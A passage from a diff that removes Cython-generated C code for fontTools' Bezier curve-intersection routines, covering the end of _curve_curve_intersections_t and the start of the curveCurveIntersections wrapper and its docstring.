- __Pyx_GOTREF(__pyx_t_3); - __pyx_v_found = ((PyObject*)__pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1339 - * found = [] - * found.extend( - * _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * c11, c21, precision, range1=c11_range, range2=c21_range - * ) - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_curve_curve_intersections_t); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1339, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - - /* "fontTools/misc/bezierTools.py":1340 - * found.extend( - * _curve_curve_intersections_t( - * c11, c21, precision, range1=c11_range, range2=c21_range # <<<<<<<<<<<<<< - * ) - * ) - */ - __pyx_t_2 = PyTuple_New(3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1339, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_c11); - __Pyx_GIVEREF(__pyx_v_c11); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_v_c11)) __PYX_ERR(0, 1339, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_c21); - __Pyx_GIVEREF(__pyx_v_c21); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_c21)) __PYX_ERR(0, 1339, __pyx_L1_error); - __Pyx_INCREF(__pyx_cur_scope->__pyx_v_precision); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_precision); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 2, __pyx_cur_scope->__pyx_v_precision)) __PYX_ERR(0, 1339, __pyx_L1_error); - __pyx_t_1 = __Pyx_PyDict_NewPresized(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1340, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - if (PyDict_SetItem(__pyx_t_1, __pyx_n_s_range1, __pyx_v_c11_range) < 0) __PYX_ERR(0, 1340, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_1, __pyx_n_s_range2, __pyx_v_c21_range) < 0) __PYX_ERR(0, 1340, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1339 - * found = [] - * found.extend( - * _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * c11, c21, precision, range1=c11_range, range2=c21_range - * ) - */ - __pyx_t_7 = __Pyx_PyObject_Call(__pyx_t_3, __pyx_t_2, __pyx_t_1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1339, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1338 - * - * found = [] - * found.extend( # <<<<<<<<<<<<<< - * _curve_curve_intersections_t( - * c11, c21, precision, range1=c11_range, range2=c21_range - */ - __pyx_t_9 = __Pyx_PyList_Extend(__pyx_v_found, __pyx_t_7); if (unlikely(__pyx_t_9 == ((int)-1))) __PYX_ERR(0, 1338, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - - /* "fontTools/misc/bezierTools.py":1344 - * ) - * found.extend( - * _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * c12, c21, precision, range1=c12_range, range2=c21_range - * ) - */ - __Pyx_GetModuleGlobalName(__pyx_t_7, __pyx_n_s_curve_curve_intersections_t); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1344, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - - /* "fontTools/misc/bezierTools.py":1345 - * found.extend( - * _curve_curve_intersections_t( - * c12, c21, precision, range1=c12_range, range2=c21_range # <<<<<<<<<<<<<< - * ) - * ) - */ - __pyx_t_1 = PyTuple_New(3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1344, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_c12); - __Pyx_GIVEREF(__pyx_v_c12); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_c12)) __PYX_ERR(0, 1344, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_c21); - __Pyx_GIVEREF(__pyx_v_c21); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_c21)) __PYX_ERR(0, 1344, __pyx_L1_error); - __Pyx_INCREF(__pyx_cur_scope->__pyx_v_precision); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_precision); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_cur_scope->__pyx_v_precision)) __PYX_ERR(0, 1344, __pyx_L1_error); - __pyx_t_2 = __Pyx_PyDict_NewPresized(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1345, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_t_2, __pyx_n_s_range1, __pyx_v_c12_range) < 0) __PYX_ERR(0, 1345, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_2, __pyx_n_s_range2, __pyx_v_c21_range) < 0) __PYX_ERR(0, 1345, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1344 - * ) - * found.extend( - * _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * c12, c21, precision, range1=c12_range, range2=c21_range - * ) - */ - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_t_7, __pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1344, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1343 - * ) - * ) - * found.extend( # <<<<<<<<<<<<<< - * _curve_curve_intersections_t( - * c12, c21, precision, range1=c12_range, range2=c21_range - */ - __pyx_t_9 = __Pyx_PyList_Extend(__pyx_v_found, __pyx_t_3); if (unlikely(__pyx_t_9 == ((int)-1))) __PYX_ERR(0, 1343, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1349 - * ) - * found.extend( - * _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * c11, c22, precision, range1=c11_range, range2=c22_range - * ) - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_curve_curve_intersections_t); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1349, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - - /* "fontTools/misc/bezierTools.py":1350 - * found.extend( - * _curve_curve_intersections_t( - * c11, c22, precision, range1=c11_range, range2=c22_range # <<<<<<<<<<<<<< - * ) - * ) - */ - __pyx_t_2 = PyTuple_New(3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1349, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_c11); - __Pyx_GIVEREF(__pyx_v_c11); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_v_c11)) __PYX_ERR(0, 1349, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_c22); - __Pyx_GIVEREF(__pyx_v_c22); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_c22)) __PYX_ERR(0, 1349, __pyx_L1_error); - __Pyx_INCREF(__pyx_cur_scope->__pyx_v_precision); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_precision); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 2, __pyx_cur_scope->__pyx_v_precision)) __PYX_ERR(0, 1349, __pyx_L1_error); - __pyx_t_1 = __Pyx_PyDict_NewPresized(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1350, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - if (PyDict_SetItem(__pyx_t_1, __pyx_n_s_range1, __pyx_v_c11_range) < 0) __PYX_ERR(0, 1350, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_1, __pyx_n_s_range2, __pyx_v_c22_range) < 0) __PYX_ERR(0, 1350, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1349 - * ) - * found.extend( - * _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * c11, c22, precision, range1=c11_range, range2=c22_range - * ) - */ - __pyx_t_7 = __Pyx_PyObject_Call(__pyx_t_3, __pyx_t_2, __pyx_t_1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1349, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1348 - * ) - * ) - * found.extend( # <<<<<<<<<<<<<< - * _curve_curve_intersections_t( - * c11, c22, precision, range1=c11_range, range2=c22_range - */ - __pyx_t_9 = __Pyx_PyList_Extend(__pyx_v_found, __pyx_t_7); if (unlikely(__pyx_t_9 == ((int)-1))) __PYX_ERR(0, 1348, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - - /* "fontTools/misc/bezierTools.py":1354 - * ) - * found.extend( - * _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * c12, c22, precision, range1=c12_range, range2=c22_range - * ) - */ - __Pyx_GetModuleGlobalName(__pyx_t_7, __pyx_n_s_curve_curve_intersections_t); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1354, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - - /* "fontTools/misc/bezierTools.py":1355 - * found.extend( - * _curve_curve_intersections_t( - * c12, c22, precision, range1=c12_range, range2=c22_range # <<<<<<<<<<<<<< - * ) - * ) - */ - __pyx_t_1 = PyTuple_New(3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1354, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_c12); - __Pyx_GIVEREF(__pyx_v_c12); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_c12)) __PYX_ERR(0, 1354, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_c22); - __Pyx_GIVEREF(__pyx_v_c22); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_c22)) __PYX_ERR(0, 1354, __pyx_L1_error); - __Pyx_INCREF(__pyx_cur_scope->__pyx_v_precision); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_precision); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_cur_scope->__pyx_v_precision)) __PYX_ERR(0, 1354, __pyx_L1_error); - __pyx_t_2 = __Pyx_PyDict_NewPresized(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1355, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_t_2, __pyx_n_s_range1, __pyx_v_c12_range) < 0) __PYX_ERR(0, 1355, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_2, __pyx_n_s_range2, __pyx_v_c22_range) < 0) __PYX_ERR(0, 1355, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1354 - * ) - * found.extend( - * _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * c12, c22, precision, range1=c12_range, range2=c22_range - * ) - */ - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_t_7, __pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1354, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1353 - * ) - * ) - * found.extend( # <<<<<<<<<<<<<< - * _curve_curve_intersections_t( - * c12, c22, precision, range1=c12_range, range2=c22_range - */ - __pyx_t_9 = __Pyx_PyList_Extend(__pyx_v_found, __pyx_t_3); if (unlikely(__pyx_t_9 == ((int)-1))) __PYX_ERR(0, 1353, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1359 - * ) - * - * unique_key = lambda ts: (int(ts[0] / precision), int(ts[1] / precision)) # <<<<<<<<<<<<<< - * seen = set() - * unique_values = [] - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_2lambda3, 0, __pyx_n_s_curve_curve_intersections_t_loc_2, ((PyObject*)__pyx_cur_scope), __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1359, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_unique_key = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1360 - * - * unique_key = lambda ts: (int(ts[0] / precision), int(ts[1] / precision)) - * seen = set() # <<<<<<<<<<<<<< - * unique_values = [] - * - */ - __pyx_t_3 = PySet_New(0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1360, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_seen = ((PyObject*)__pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1361 - * unique_key = lambda ts: (int(ts[0] / precision), int(ts[1] / precision)) - * seen = set() - * unique_values = [] # <<<<<<<<<<<<<< - * - * for ts in found: - */ - __pyx_t_3 = PyList_New(0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1361, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_unique_values = ((PyObject*)__pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1363 - * unique_values = [] - * - * for ts in found: # <<<<<<<<<<<<<< - * key = unique_key(ts) - * if key in seen: - */ - __pyx_t_3 = __pyx_v_found; __Pyx_INCREF(__pyx_t_3); - __pyx_t_10 = 0; - for (;;) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_3); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1363, __pyx_L1_error) - #endif - if (__pyx_t_10 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_2 = PyList_GET_ITEM(__pyx_t_3, __pyx_t_10); __Pyx_INCREF(__pyx_t_2); __pyx_t_10++; if (unlikely((0 < 0))) __PYX_ERR(0, 1363, __pyx_L1_error) - #else - __pyx_t_2 = __Pyx_PySequence_ITEM(__pyx_t_3, __pyx_t_10); __pyx_t_10++; if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1363, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - __Pyx_XDECREF_SET(__pyx_v_ts, __pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1364 - * - * for ts in found: - * key = unique_key(ts) # <<<<<<<<<<<<<< - * if key in seen: - * continue - */ - __pyx_t_2 = __pyx_lambda_funcdef_lambda3(__pyx_v_unique_key, __pyx_v_ts); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1364, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_XDECREF_SET(__pyx_v_key, __pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1365 - * for ts in found: - * key = unique_key(ts) - * if key in seen: # <<<<<<<<<<<<<< - * continue - * seen.add(key) - */ - __pyx_t_6 = (__Pyx_PySet_ContainsTF(__pyx_v_key, __pyx_v_seen, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 1365, __pyx_L1_error) - if (__pyx_t_6) { - - /* "fontTools/misc/bezierTools.py":1366 - * key = unique_key(ts) - * if key in seen: - * continue # <<<<<<<<<<<<<< - * seen.add(key) - * unique_values.append(ts) - */ - goto __pyx_L15_continue; - - /* "fontTools/misc/bezierTools.py":1365 - * for ts in found: - * key = unique_key(ts) - * if key in seen: # <<<<<<<<<<<<<< - * continue - * seen.add(key) - */ - } - - /* "fontTools/misc/bezierTools.py":1367 - * if key in seen: - * continue - * seen.add(key) # <<<<<<<<<<<<<< - * unique_values.append(ts) - * - */ - __pyx_t_9 = PySet_Add(__pyx_v_seen, __pyx_v_key); if (unlikely(__pyx_t_9 == ((int)-1))) __PYX_ERR(0, 1367, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1368 - * continue - * seen.add(key) - * unique_values.append(ts) # <<<<<<<<<<<<<< - * - * return unique_values - */ - __pyx_t_9 = __Pyx_PyList_Append(__pyx_v_unique_values, __pyx_v_ts); if (unlikely(__pyx_t_9 == ((int)-1))) __PYX_ERR(0, 1368, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1363 - * unique_values = [] - * - * for ts in found: # <<<<<<<<<<<<<< - * key = unique_key(ts) - * if key in seen: - */ - __pyx_L15_continue:; - } - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1370 - * unique_values.append(ts) - * - * return unique_values # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_INCREF(__pyx_v_unique_values); - __pyx_r = __pyx_v_unique_values; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1306 - * - * - * def _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * curve1, curve2, precision=1e-3, range1=None, range2=None - * ): - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_AddTraceback("fontTools.misc.bezierTools._curve_curve_intersections_t", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_bounds1); - __Pyx_XDECREF(__pyx_v_bounds2); - __Pyx_XDECREF(__pyx_v_intersects); - __Pyx_XDECREF(__pyx_v__); - __Pyx_XDECREF(__pyx_v_midpoint); - __Pyx_XDECREF(__pyx_v_c11); - __Pyx_XDECREF(__pyx_v_c12); - __Pyx_XDECREF(__pyx_v_c11_range); - __Pyx_XDECREF(__pyx_v_c12_range); - __Pyx_XDECREF(__pyx_v_c21); - __Pyx_XDECREF(__pyx_v_c22); - __Pyx_XDECREF(__pyx_v_c21_range); - __Pyx_XDECREF(__pyx_v_c22_range); - __Pyx_XDECREF(__pyx_v_found); - __Pyx_XDECREF(__pyx_v_unique_key); - __Pyx_XDECREF(__pyx_v_seen); - __Pyx_XDECREF(__pyx_v_unique_values); - __Pyx_XDECREF(__pyx_v_ts); - __Pyx_XDECREF(__pyx_v_key); - __Pyx_XDECREF(__pyx_v_range1); - __Pyx_XDECREF(__pyx_v_range2); - __Pyx_DECREF((PyObject *)__pyx_cur_scope); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1373 - * - * - * def curveCurveIntersections(curve1, curve2): # <<<<<<<<<<<<<< - * """Finds intersections between a curve and a curve. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_87curveCurveIntersections(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_86curveCurveIntersections, "curveCurveIntersections(curve1, curve2)\nFinds intersections between a curve and a curve.\n\n Args:\n curve1: List of coordinates of the first curve segment as 2D tuples.\n curve2: List of coordinates of the second curve segment as 2D tuples.\n\n Returns:\n A list of ``Intersection`` objects, each object having ``pt``, ``t1``\n and ``t2`` attributes containing the intersection point, time on first\n segment and time on second segment respectively.\n\n Examples::\n >>> curve1 = [ (10,100), (90,30), (40,140), (220,220) ]\n >>> curve2 = [ (5,150), (180,20), (80,250), (210,190) ]\n >>> intersections = curveCurveIntersections(curve1, curve2)\n >>> len(intersections)\n 3\n >>> intersections[0].pt\n (81.7831487395506, 109.88904552375288)\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_87curveCurveIntersections = {"curveCurveIntersections", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_87curveCurveIntersections, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_86curveCurveIntersections}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_87curveCurveIntersections(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_curve1 = 0; - PyObject *__pyx_v_curve2 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[2] = {0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("curveCurveIntersections (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_curve1,&__pyx_n_s_curve2,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_curve1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1373, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_curve2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1373, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("curveCurveIntersections", 1, 2, 2, 1); __PYX_ERR(0, 1373, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "curveCurveIntersections") < 0)) __PYX_ERR(0, 1373, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 2)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - } - __pyx_v_curve1 = values[0]; - __pyx_v_curve2 = values[1]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("curveCurveIntersections", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 1373, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.curveCurveIntersections", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_86curveCurveIntersections(__pyx_self, __pyx_v_curve1, __pyx_v_curve2); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_86curveCurveIntersections(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_curve1, PyObject *__pyx_v_curve2) { - PyObject *__pyx_v_intersection_ts = NULL; - PyObject *__pyx_8genexpr7__pyx_v_ts = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_t_4; - Py_ssize_t __pyx_t_5; - PyObject *(*__pyx_t_6)(PyObject *); - PyObject *__pyx_t_7 = NULL; - PyObject *__pyx_t_8 = NULL; - PyObject *__pyx_t_9 = NULL; - PyObject *__pyx_t_10 = NULL; - PyObject *__pyx_t_11 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("curveCurveIntersections", 1); - - /* "fontTools/misc/bezierTools.py":1394 - * (81.7831487395506, 109.88904552375288) - * """ - * intersection_ts = _curve_curve_intersections_t(curve1, curve2) # <<<<<<<<<<<<<< - * return [ - * Intersection(pt=segmentPointAtT(curve1, ts[0]), t1=ts[0], t2=ts[1]) - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_curve_curve_intersections_t); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1394, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_3, __pyx_v_curve1, __pyx_v_curve2}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 2+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1394, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_v_intersection_ts = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1395 - * """ - * intersection_ts = _curve_curve_intersections_t(curve1, curve2) - * return [ # <<<<<<<<<<<<<< - * Intersection(pt=segmentPointAtT(curve1, ts[0]), t1=ts[0], t2=ts[1]) - * for ts in intersection_ts - */ - __Pyx_XDECREF(__pyx_r); - { /* enter inner scope */ - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1395, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_1); - - /* "fontTools/misc/bezierTools.py":1397 - * return [ - * Intersection(pt=segmentPointAtT(curve1, ts[0]), t1=ts[0], t2=ts[1]) - * for ts in intersection_ts # <<<<<<<<<<<<<< - * ] - * - */ - if (likely(PyList_CheckExact(__pyx_v_intersection_ts)) || PyTuple_CheckExact(__pyx_v_intersection_ts)) { - __pyx_t_2 = __pyx_v_intersection_ts; __Pyx_INCREF(__pyx_t_2); - __pyx_t_5 = 0; - __pyx_t_6 = NULL; - } else { - __pyx_t_5 = -1; __pyx_t_2 = PyObject_GetIter(__pyx_v_intersection_ts); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1397, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_6 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_2); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1397, __pyx_L5_error) - } - for (;;) { - if (likely(!__pyx_t_6)) { - if (likely(PyList_CheckExact(__pyx_t_2))) { - { - Py_ssize_t __pyx_temp = 